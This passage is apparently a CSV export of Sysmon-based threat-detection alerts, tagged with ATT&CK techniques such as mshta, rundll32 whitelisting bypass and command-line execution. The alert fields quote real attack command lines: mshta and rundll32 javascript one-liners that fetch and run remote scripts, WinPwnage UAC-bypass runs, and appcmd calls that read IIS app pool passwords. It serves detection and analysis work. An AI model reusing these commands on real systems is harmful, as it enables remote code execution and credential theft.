through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6180 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.402 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4128 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:39.888 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49703 + + false + 108.179.232.58 + gator4243.hostgator.com + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10153 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 22:49:09.276 + 365ABB72-D0E5-5CC8-0000-0010DADF3E00 + 2892 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-C494-5CC8-0000-0020E4FF0000 + 0xffe4 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-D0E4-5CC8-0000-00103CB73E00 + 3680 + C:\Windows\Installer\MSI4FFD.tmp + "C:\Windows\Installer\MSI4FFD.tmp" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5934 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.702 + 365ABB72-3D6E-5CEB-0000-0010AFA2FF00 + 3812 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". 
)" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with 
Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + 
"C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe 
javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ 
)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + 
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\System32\cmd.exe") in directory : ( C:\Users\bouss\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10920364 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-10-21 16:27:02.278 + 00247C92-94D6-6171-0000-00100514967B + 28176 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript.exe + cscript.exe //e:jscript testme.js + C:\Users\bouss\Desktop\ + LAPTOP-JU4M3I0E\bouss + 00247C92-3C1A-6169-0000-0020C2790700 + 0x779c2 + 1 + Medium + SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 00247C92-85C9-6170-0000-001008E62B6B + 24148 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL 
c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5931 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.622 + 365ABB72-3D6E-5CEB-0000-0010EF9EFF00 + 3756 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". 
)" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application 
Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164913 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 22:28:20.529 + 00247C92-9E04-5F7B-0000-0010CF98272C + 12876 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + C:\windows\system32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + 
High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-9E03-5F7B-0000-0010A645272C + 20228 + C:\Windows\System32\mmc.exe + "C:\Windows\System32\mmc.exe" WF.msc + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6177 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.437 + 365ABB72-FE6D-5CEB-0000-0010122D0C00 + 1636 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User 
(MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4904 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.451 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + 
